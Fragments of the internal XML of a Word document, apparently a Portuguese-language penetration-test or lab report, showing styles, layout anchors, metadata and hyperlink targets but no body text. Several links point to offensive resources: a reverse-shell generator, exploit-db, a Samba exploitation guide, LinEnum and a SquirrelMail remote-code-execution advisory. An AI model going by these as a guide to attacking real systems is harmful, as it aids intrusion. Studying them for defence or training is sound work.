        <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="16" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="54F5B97D" wp14:editId="71D9D257">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-1476375</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-447675</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="10943590" cy="542925"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapNone/>
          <wp:docPr id="3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943590" cy="542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 w:cs="Arial"/>
        <w:b/>
        <w:noProof/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="31" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4C673CF4" wp14:editId="2F9A4577">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>5358130</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-354330</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="875030" cy="351790"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapNone/>
          <wp:docPr id="36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75030" cy="351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337A452" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16">
    <w:pP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47129" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C1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B1D76"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F06B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7894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6C16"/>
    <w:rsid w:val="00126C16"/>
    <w:rsid w:val="003D7612"/>
    <w:rsid w:val="004225B7"/>
    <w:rsid w:val="00700B42"/>
    <w:rsid w:val="008405CE"/>
    <w:rsid w:val="00A01938"/>
    <w:rsid w:val="00B867A4"/>
    <w:rsid w:val="00D7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C1D02"/>
  <w15:docId w15:val="{E4F338D6-322C-40F6-B8F7-B08B0DA26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 w:themeColor="dark1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo7Char"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="595959" w:themeColor="dark1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo8Char"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="dark1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo9Char"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="272727" w:themeColor="dark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qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos Display" w:eastAsia="Aptos" w:hAnsi="Aptos Display" w:cs="Aptos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qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos Display" w:eastAsia="Aptos" w:hAnsi="Aptos Display" w:cs="Aptos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qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Aptos" w:cs="Aptos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qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Aptos" w:cs="Aptos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qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Aptos" w:cs="Aptos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qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Aptos" w:cs="Aptos"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959" w:themeColor="dark1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo7Char">
    <w:name w:val="Título 7 Char"/>
    <w:basedOn w:val="Fontepargpadro"/>
    <w:link w:val="Ttulo7"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Aptos" w:cs="Aptos"/>
      <w:color w:val="595959" w:themeColor="dark1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo8Char">
    <w:name w:val="Título 8 Char"/>
    <w:basedOn w:val="Fontepargpadro"/>
    <w:link w:val="Ttulo8"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Aptos" w:cs="Aptos"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="dark1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo9Char">
    <w:name w:val="Título 9 Char"/>
    <w:basedOn w:val="Fontepargpadro"/>
    <w:link w:val="Ttulo9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Aptos" w:cs="Aptos"/>
      <w:color w:val="272727" w:themeColor="dark1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TtuloChar">
    <w:name w:val="Título Char"/>
    <w:basedOn w:val="Fontepargpadro"/>
    <w:link w:val="Ttulo"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos Display" w:eastAsia="Aptos" w:hAnsi="Aptos Display" w:cs="Aptos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qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Aptos" w:cs="Aptos"/>
      <w:color w:val="595959" w:themeColor="dark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qFormat/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="dark1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="nfaseIntensa">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="Fontepargpadro"/>
    <w:qFormat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qFormat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qFormat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qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="RodapChar">
    <w:name w:val="Rodapé Char"/>
    <w:basedOn w:val="Fontepargpadro"/>
    <w:link w:val="Rodap"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TtuloGuardianChar">
    <w:name w:val="Título [Guardian] Char"/>
    <w:basedOn w:val="Fontepargpadro"/>
    <w:link w:val="TtuloGuardian"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Fontepargpadro"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SubttuloGuardianChar">
    <w:name w:val="Subtítulo [Guardian] Char"/>
    <w:basedOn w:val="TtuloGuardianChar"/>
    <w:link w:val="SubttuloGuardian"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24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paragraph" w:styleId="Citao">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="CitaoChar"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pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4252"/>
        <w:tab w:val="right" w:pos="8504"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:p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qFormat/>
    <w:pPr>
      <w:spacing w:before="240" w:after="0"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TtuloGuardian">
    <w:name w:val="Título [Guardian]"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TtuloGuardianChar"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sumrio1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SubttuloGuardian">
    <w:name w:val="Subtítulo [Guardian]"/>
    <w:basedOn w:val="TtuloGuardian"/>
    <w:link w:val="SubttuloGuardianChar"/>
    <w:qFormat/>
    <w:pPr>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sumrio2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220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4225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www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/?ref=blog.tryhackme.com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yperlink" Target="https://medium.com/@uukail2005/samba-smbd-3-x-4-x-exploitation-59a8d9431ea1" TargetMode="External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yperlink" Target="https://www.revshells.com/" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/2597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s://github.com/CuppaCMS/CuppaCMS/issues/33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tldp.org/HOWTO/SMB-HOWTO-8.html" TargetMode="External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s://github.com/rebootuser/LinEnum" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln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930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COELHO ROCHA PINTO</dc:creator>
  <dc:description/>
  <cp:lastModifiedBy>Larissa Gomes</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <cp:lastPrinted>2025-10-07T19:16:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-08T20:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-23T12:59:00Z</dcterms:modified>
  <dc:language>en-US</dc:language>
</cp:coreProperties>
</file>